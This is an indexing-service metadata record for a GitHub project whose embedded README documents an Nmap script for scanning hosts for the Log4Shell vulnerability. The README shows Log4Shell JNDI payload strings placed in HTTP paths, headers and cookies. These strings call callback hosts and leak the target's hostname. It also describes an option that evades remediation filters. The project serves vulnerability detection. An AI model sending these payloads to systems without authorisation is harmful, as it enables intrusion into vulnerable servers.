{"id":13296900,"url":"https://github.com/righel/log4shell_nse","last_synced_at":"2025-06-26T02:37:51.233Z","repository":{"id":45453407,"uuid":"437265470","full_name":"righel/log4shell_nse","owner":"righel","description":"nse script to inject jndi payloads","archived":false,"fork":false,"pushed_at":"2021-12-13T14:58:03.000Z","size":17,"stargazers_count":46,"open_issues_count":0,"forks_count":10,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-10T09:41:58.721Z","etag":null,"topics":["cve","log4j","log4shell","nmap"],"latest_commit_sha":null,"homepage":"","language":"Lua","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/righel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-11T11:39:36.000Z","updated_at":"2025-01-28T05:22:41.000Z","dependencies_parsed_at":"2022-08-04T12:30:10.911Z","dependency_job_id":null,"html_url":"https://github.com/righel/log4shell_nse","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/righel/log4shell_nse","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/righel","download_url":"https://codeload.github.com/righel/log4shell_nse/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/righel%2Flog4shell_nse/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261988019,"owners_count":23240951,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","log4j","log4shell","nmap"],"created_at":"2024-07-29T17:21:17.964Z","updated_at":"2025-06-26T02:37:51.213Z","avatar_url":"https://github.com/righel.png","language":"Lua","readme":"## log4shell.nse\nInjects a Huntress/CanaryTokens/custom log4shell payload in HTTP requests described by JSON templates.\nResults expire after 30 minutes.\n\n### Sample usage\n```\n$ nmap --script log4shell.nse --script-args id=\u003cuuid\u003e,mode=huntress -p 80 localhost\nStarting Nmap 7.80 ( https://nmap.org ) at 2021-12-11 12:43 CET\nNmap scan report for localhost (127.0.0.1)\nHost is up (0.000059s latency).\n\nPORT   STATE SERVICE\n80/tcp open  http\n|_log4shell: Check https://log4shell.huntress.com/view/\u003cuuid\u003e for results.\n\nNmap done: 1 IP address (1 host up) scanned in 0.13 seconds\n```\n\n### Options\n* `id`: Unique id linked with this scan.\n* `mode`: Payload template, one of `huntress`, `canary_tokens` or `custom`.\n* `payload`: Specify a custom payload, should include `%s` where the unique id related to this scan will be replaced.\n* `stealth`: Bypass initial remediation methods by masking `ldap` in the payload, this may cause the payload to execute multiple times. \n* `templates`: Path to a custom json templates file. \n\n\n### Examples\n\n* Huntress:\n```\n$ nmap --script log4shell.nse --script-args=id=\u003chash\u003e,mode=huntress -p http* 127.0.0.1\n```\n\n* CanaryTokens:\n```\n$ nmap --script log4shell.nse --script-args=id=\u003chash\u003e,mode=canary_tokens -p http* 127.0.0.1\n```\n\n* Custom payload:\n```\n$ nmap --script log4shell.nse --script-args=id=\u003chash\u003e,mode=custom,payload=\"jndi:dns:/%s.tracker.com\" -p http* 127.0.0.1\n```\n\n### Templates\nThe script sends the payload depending on the template config. Many templates can be defined in a single json template file, this will result in multiple requests to be send to each target.\n\n\nThe following example will send a single `HTTP` `GET` request for each port `Nmap` detected as open.\n\n* It's recommended to use the `-p http*` option when running `Nmap` so we don't spam ports that do not speak `http`.\n\nConfigurable template properties:\n* `id`: Unique identifier of the template.\n* `name`: Name of the template.\n* `method`: HTTP verb for the request `GET`, `HEAD`, `POST`, `PUT`, ... , default: `\"GET\"`.\n* `path`: URI to send the request, any query string parameter should be added here, default: `\"/\"`.\n* `headers`: Array of headers to send with the request.\n* `body`: Body of the request, specially when using `POST`/`PUT`/... methods.\n\n**Example:**\n```json\n[\n    {\n        \"id\": \"1\",\n        \"name\": \"sample-template\",\n        \"method\": \"GET\",\n        \"path\": \"/{payload}?utm_source={payload}\",\n        \"headers\": [\n            {\n                \"name\": \"User-Agent\",\n                \"format\": \"{payload}\"\n            },\n            {\n                \"name\": \"Referer\",\n                \"format\": \"{payload}\"\n            },\n            {\n                \"name\": \"Cookie\",\n                \"format\": \"JSESSIONID={payload}\"\n            }\n        ]\n    }\n]\n```\nThis will result in the following http request:\n```\nHTTP GET /${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}?utm_source=${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nHeaders:\nConnection: close\nUser-Agent: ${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nCookie: JSESSIONID=${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nReferer: ${jndi:ldap://x${hostName}.L4J.XXX.canarytokens.com/a}\nHost: localhost:7800\n```\n\n\n\nReferences:\n- https://log4shell.huntress.com/\n- https://canarytokens.org/generate\n- https://www.lunasec.io/docs/blog/log4j-zero-day/\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frighel%2Flog4shell_nse","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frighel%2Flog4shell_nse","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frighel%2Flog4shell_nse/lists"}